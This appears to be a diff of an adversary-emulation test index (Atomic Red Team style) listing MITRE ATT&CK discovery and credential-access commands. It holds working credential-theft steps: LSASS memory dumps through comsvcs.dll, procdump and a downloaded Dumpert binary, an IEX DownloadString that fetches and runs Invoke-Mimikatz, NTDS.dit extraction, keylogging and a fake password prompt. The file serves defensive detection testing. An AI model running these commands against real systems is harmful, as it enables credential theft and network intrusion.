'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -17570,7 +17581,7 @@ discovery:
|
|
|
|
|
- name: Network Share Discovery
|
|
|
|
|
description: 'Network Share Discovery
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -17601,7 +17612,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'net view \\#{computer_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Network Share Discovery PowerShell
|
|
|
|
|
description: |
|
|
|
|
|
Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host
|
|
|
|
@@ -17630,7 +17641,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'net share
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1040:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -17821,19 +17832,19 @@ discovery:
|
|
|
|
|
- name: Examine password complexity policy - Ubuntu
|
|
|
|
|
description: 'Lists the password complexity policy to console on Ubuntu Linux.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'cat /etc/pam.d/common-password
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Examine password complexity policy - CentOS/RHEL 7.x
|
|
|
|
|
description: 'Lists the password complexity policy to console on CentOS/RHEL
|
|
|
|
|
7.x Linux.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
dependencies:
|
|
|
|
@@ -17845,12 +17856,12 @@ discovery:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'cat /etc/security/pwquality.conf
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Examine password complexity policy - CentOS/RHEL 6.x
|
|
|
|
|
description: 'Lists the password complexity policy to console on CentOS/RHEL
|
|
|
|
|
6.x Linux.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
dependencies:
|
|
|
|
@@ -17866,18 +17877,18 @@ discovery:
|
|
|
|
|
- name: Examine password expiration policy - All Linux
|
|
|
|
|
description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'cat /etc/login.defs
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Examine local password policy - Windows
|
|
|
|
|
description: 'Lists the local password policy to console on Windows.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -17885,11 +17896,11 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'net accounts
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Examine domain password policy - Windows
|
|
|
|
|
description: 'Lists the domain password policy to console on Windows.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -17897,11 +17908,11 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'net accounts /domain
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Examine password policy - macOS
|
|
|
|
|
description: 'Lists the password policy to console on macOS.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -17983,7 +17994,7 @@ discovery:
|
|
|
|
|
- name: Permission Groups Discovery
|
|
|
|
|
description: 'Permission Groups Discovery
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -17994,9 +18005,9 @@ discovery:
|
|
|
|
|
dscl . -list /Groups
|
|
|
|
|
groups
|
|
|
|
|
- name: Basic Permission Groups Discovery Windows
|
|
|
|
|
description: 'Basic Permission Groups Discovery for Windows
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
|
|
|
|
|
information will be displayed.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -18007,9 +18018,9 @@ discovery:
|
|
|
|
|
net group /domain
|
|
|
|
|
net group "domain admins" /domain
|
|
|
|
|
- name: Permission Groups Discovery PowerShell
|
|
|
|
|
description: 'Permission Groups Discovery utilizing PowerShell
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
|
|
|
|
|
information will be displayed.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -18024,10 +18035,9 @@ discovery:
|
|
|
|
|
get-localgroup
|
|
|
|
|
get-ADPrincipalGroupMembership #{user} | select name
|
|
|
|
|
- name: Elevated group enumeration using net group
|
|
|
|
|
description: 'Runs "net group" command including command aliases and loose typing
|
|
|
|
|
to simulate enumeration/discovery of high value domain groups
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This
|
|
|
|
|
test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -18116,7 +18126,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'tasklist
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1012:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -18302,7 +18312,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'net group "Domain Computers" /domain
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Remote System Discovery - nltest
|
|
|
|
|
description: |
|
|
|
|
|
Identify domain controllers for specified domain.
|
|
|
|
@@ -18320,7 +18330,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'nltest.exe /dclist:#{target_domain}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Remote System Discovery - ping sweep
|
|
|
|
|
description: |
|
|
|
|
|
Identify remote systems via ping sweep.
|
|
|
|
@@ -18333,7 +18343,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Remote System Discovery - arp
|
|
|
|
|
description: "Identify remote systems via arp. \n\nUpon successful execution,
|
|
|
|
|
cmd.exe will execute arp to list out the arp cache. Output will be via stdout.\n"
|
|
|
|
@@ -18344,7 +18354,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'arp -a
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Remote System Discovery - arp nix
|
|
|
|
|
description: |
|
|
|
|
|
Identify remote systems via arp.
|
|
|
|
@@ -18358,7 +18368,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'arp -a | grep -v ''^?''
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Remote System Discovery - sweep
|
|
|
|
|
description: "Identify remote systems via ping sweep.\n\nUpon successful execution,
|
|
|
|
|
sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if
|
|
|
|
@@ -18372,7 +18382,7 @@ discovery:
|
|
|
|
|
command: 'for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ]
|
|
|
|
|
&& echo "192.168.1.$ip UP" || : ; done
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Remote System Discovery - nslookup
|
|
|
|
|
description: "Powershell script that runs nslookup on cmd.exe against the local
|
|
|
|
|
/24 network of the first network adaptor listed in ipconfig.\n\nUpon successful
|
|
|
|
@@ -18495,7 +18505,7 @@ discovery:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'fltmc.exe | findstr.exe 385201
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Security Software Discovery - AV Discovery via WMI
|
|
|
|
|
description: |
|
|
|
|
|
Discovery of installed antivirus products via a WMI query.
|
|
|
|
@@ -18553,7 +18563,7 @@ discovery:
|
|
|
|
|
software that is installed on the system. Adversaries may use the information
|
|
|
|
|
from Software Discovery during automated discovery to shape follow-on behaviors
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -18562,13 +18572,13 @@ discovery:
|
|
|
|
|
command: 'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer"
|
|
|
|
|
/v svcVersion
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Applications Installed
|
|
|
|
|
description: 'Adversaries may attempt to get a listing of all software that
|
|
|
|
|
is installed on the system. Adversaries may use the information from Software
|
|
|
|
|
Discovery during automated discovery to shape follow-on behaviors
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -18660,7 +18670,7 @@ discovery:
|
|
|
|
|
- name: System Information Discovery
|
|
|
|
|
description: 'Identify System Info
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -18672,7 +18682,7 @@ discovery:
|
|
|
|
|
- name: System Information Discovery
|
|
|
|
|
description: 'Identify System Info
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -18685,7 +18695,7 @@ discovery:
|
|
|
|
|
- name: List OS Information
|
|
|
|
|
description: 'Identify System Info
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -18701,7 +18711,7 @@ discovery:
|
|
|
|
|
description: 'Identify virtual machine hardware. This technique is used by the
|
|
|
|
|
Pupy RAT and other malware.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -18719,7 +18729,7 @@ discovery:
|
|
|
|
|
description: 'Identify virtual machine guest kernel modules. This technique
|
|
|
|
|
is used by the Pupy RAT and other malware.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -18733,7 +18743,7 @@ discovery:
|
|
|
|
|
- name: Hostname Discovery (Windows)
|
|
|
|
|
description: 'Identify system hostname for Windows.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -18741,11 +18751,11 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'hostname
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Hostname Discovery
|
|
|
|
|
description: 'Identify system hostname for Linux and macOS systems.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -18754,11 +18764,11 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'hostname
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows MachineGUID Discovery
|
|
|
|
|
description: 'Identify the Windows MachineGUID value for a system.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -18767,7 +18777,7 @@ discovery:
|
|
|
|
|
command: 'REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v
|
|
|
|
|
MachineGuid
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1016:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -18836,7 +18846,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'netsh advfirewall firewall show rule name=all
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: System Network Configuration Discovery
|
|
|
|
|
description: |
|
|
|
|
|
Identify network configuration information.
|
|
|
|
@@ -18913,7 +18923,7 @@ discovery:
|
|
|
|
|
| Out-File -Encoding ASCII -append $file\nWrite-Host $results\n"
|
|
|
|
|
cleanup_command: 'Remove-Item -ErrorAction ignore "#{output_file}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1049:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -19007,7 +19017,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'Get-NetTCPConnection
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: System Network Connections Discovery Linux & MacOS
|
|
|
|
|
description: |
|
|
|
|
|
Get a listing of network connections.
|
|
|
|
@@ -19186,10 +19196,10 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'net.exe start >> #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1124:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -19242,9 +19252,10 @@ discovery:
|
|
|
|
|
identifier: T1124
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: System Time Discovery
|
|
|
|
|
description: 'Identify the system time
|
|
|
|
|
description: 'Identify the system time. Upon execution, the local computer system
|
|
|
|
|
time and timezone will be displayed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -19259,9 +19270,10 @@ discovery:
|
|
|
|
|
net time \\#{computer_name}
|
|
|
|
|
w32tm /tz
|
|
|
|
|
- name: System Time Discovery - PowerShell
|
|
|
|
|
description: 'Identify the system time via PowerShell
|
|
|
|
|
description: 'Identify the system time via PowerShell. Upon execution, the system
|
|
|
|
|
time will be displayed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -19269,7 +19281,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'Get-Date
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
credential-access:
|
|
|
|
|
T1098:
|
|
|
|
|
technique:
|
|
|
|
@@ -19367,7 +19379,7 @@ credential-access:
|
|
|
|
|
- name: Admin Account Manipulate
|
|
|
|
|
description: 'Manipulate Admin Account Name
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -19439,7 +19451,7 @@ credential-access:
|
|
|
|
|
description: 'Search through bash history for specifice commands we want to
|
|
|
|
|
capture
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -19462,7 +19474,7 @@ credential-access:
|
|
|
|
|
command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} >
|
|
|
|
|
#{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1110:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -19565,7 +19577,7 @@ credential-access:
|
|
|
|
|
description: 'Creates username and password files then attempts to brute force
|
|
|
|
|
on remote host
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -19942,7 +19954,7 @@ credential-access:
|
|
|
|
|
command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}'');
|
|
|
|
|
Invoke-Mimikatz -DumpCreds
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Gsecdump
|
|
|
|
|
description: "Dump credentials from memory using Gsecdump.\n\nUpon successful
|
|
|
|
|
execution, you should see domain\\username's following by two 32 characters
|
|
|
|
@@ -20050,7 +20062,7 @@ credential-access:
|
|
|
|
|
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
|
|
|
|
|
ProcDump.
|
|
|
|
|
|
|
|
|
|
Upon successful execution, you should see a file the following file created C:\Windows\Temp\lsass_dump.dmp.
|
|
|
|
|
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
|
|
|
|
|
|
|
|
|
|
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
|
|
|
|
|
supported_platforms:
|
|
|
|
@@ -20080,7 +20092,52 @@ credential-access:
|
|
|
|
|
command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n"
|
|
|
|
|
cleanup_command: 'del "#{output_file}" >nul 2> nul
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Dump LSASS.exe Memory using comsvcs.dll
|
|
|
|
|
description: |
|
|
|
|
|
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
|
|
|
|
|
|
|
|
|
|
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
name: powershell
|
|
|
|
|
command: 'C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll,
|
|
|
|
|
MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Dump LSASS.exe Memory using direct system calls and API unhooking
|
|
|
|
|
description: "The memory of lsass.exe is often dumped for offline credential
|
|
|
|
|
theft attacks. This can be achieved using direct system calls and API unhooking
|
|
|
|
|
in an effort to avoid detection. \nhttps://github.com/outflanknl/Dumpert\nhttps://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/\nUpon
|
|
|
|
|
successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp.\n\nIf
|
|
|
|
|
you see a message saying \"The system cannot find the path specified.\", try
|
|
|
|
|
using the get-prereq_commands to download the tool first.\n"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
dumpert_exe:
|
|
|
|
|
description: Path of Dumpert executable
|
|
|
|
|
type: Path
|
|
|
|
|
default: PathToAtomicsFolder\T1003\bin\Outflank-Dumpert.exe
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
|
|
|
|
|
prereq_command: 'if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}'
|
|
|
|
|
get_prereq_command: |-
|
|
|
|
|
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
|
|
|
|
|
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
|
|
|
|
|
executor:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: "#{dumpert_exe}\n"
|
|
|
|
|
cleanup_command: 'del C:\windows\temp\dumpert.dmp >nul 2> nul
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Dump LSASS.exe Memory using Windows Task Manager
|
|
|
|
|
description: |
|
|
|
|
|
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
|
|
|
|
@@ -20134,7 +20191,7 @@ credential-access:
|
|
|
|
|
command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords
|
|
|
|
|
full" exit
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Dump Active Directory Database with NTDSUtil
|
|
|
|
|
description: |
|
|
|
|
|
This test is intended to be run on a domain Controller.
|
|
|
|
@@ -20162,7 +20219,7 @@ credential-access:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create Volume Shadow Copy with NTDS.dit
|
|
|
|
|
description: |
|
|
|
|
|
This test is intended to be run on a domain Controller.
|
|
|
|
@@ -20186,7 +20243,7 @@ credential-access:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'vssadmin.exe create shadow /for=#{drive_letter}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Copy NTDS.dit from Volume Shadow Copy
|
|
|
|
|
description: "This test is intended to be run on a domain Controller.\n\nThe
|
|
|
|
|
Active Directory database NTDS.dit may be dumped by copying it from a Volume
|
|
|
|
@@ -20234,7 +20291,7 @@ credential-access:
|
|
|
|
|
files on the Domain Controller. This value can be decrypted with gpp-decrypt
|
|
|
|
|
on Kali Linux.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
@@ -20249,7 +20306,7 @@ credential-access:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'findstr /S cpassword %logonserver%\sysvol\*.xml
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: GPP Passwords (Get-GPPPassword)
|
|
|
|
|
description: |
|
|
|
|
|
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller.
|
|
|
|
@@ -20310,11 +20367,11 @@ credential-access:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'pypykatz live lsa
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Registry parse with pypykatz
|
|
|
|
|
description: 'Parses registry hives to obtain stored credentials
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
@@ -20333,7 +20390,7 @@ credential-access:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'pypykatz live registry
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1081:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -20409,11 +20466,11 @@ credential-access:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'python2 laZagne.py all
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Extract passwords with grep
|
|
|
|
|
description: 'Extracting credentials from files
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_path:
|
|
|
|
|
description: Path to search
|
|
|
|
@@ -20426,11 +20483,11 @@ credential-access:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'grep -ri password #{file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Extracting passwords with findstr
|
|
|
|
|
description: 'Extracting Credentials from Files
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -20443,7 +20500,7 @@ credential-access:
|
|
|
|
|
description: 'Attempts to access unattend.xml, where credentials are commonly
|
|
|
|
|
stored, within the Panther directory where installation logs are stored.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -20506,7 +20563,7 @@ credential-access:
|
|
|
|
|
- name: Enumeration for Credentials in Registry
|
|
|
|
|
description: 'Queries to enumerate for credentials in the Registry.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -20518,7 +20575,7 @@ credential-access:
|
|
|
|
|
- name: Enumeration for PuTTY Credentials in Registry
|
|
|
|
|
description: 'Queries to enumerate for PuTTY credentials in the Registry.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -20526,7 +20583,7 @@ credential-access:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1179:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -20656,7 +20713,7 @@ credential-access:
|
|
|
|
|
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
|
|
|
|
|
description: 'Hooks functions in PowerShell to read TLS Communications
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -20764,7 +20821,7 @@ credential-access:
|
|
|
|
|
.\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
|
|
|
|
|
cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1141:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -20838,7 +20895,7 @@ credential-access:
|
|
|
|
|
to apply changes." & return & return default answer "" with icon 1 with
|
|
|
|
|
hidden answer with title "Software Update"''
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: PowerShell - Prompt User for Password
|
|
|
|
|
description: |
|
|
|
|
|
Prompt User for Password (Local Phishing) as seen in Stitch RAT.
|
|
|
|
@@ -20928,19 +20985,20 @@ credential-access:
|
|
|
|
|
identifier: T1208
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Request for service tickets
|
|
|
|
|
description: |
|
|
|
|
|
This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
|
|
|
|
|
|
|
|
|
|
The following are further sources and credits for this attack:
|
|
|
|
|
[Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
|
|
|
|
|
[Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
|
|
|
|
|
description: "This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1\n\nThe
|
|
|
|
|
following are further sources and credits for this attack:\n[Kerberoasting
|
|
|
|
|
Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)\n[Invoke-Kerberoast
|
|
|
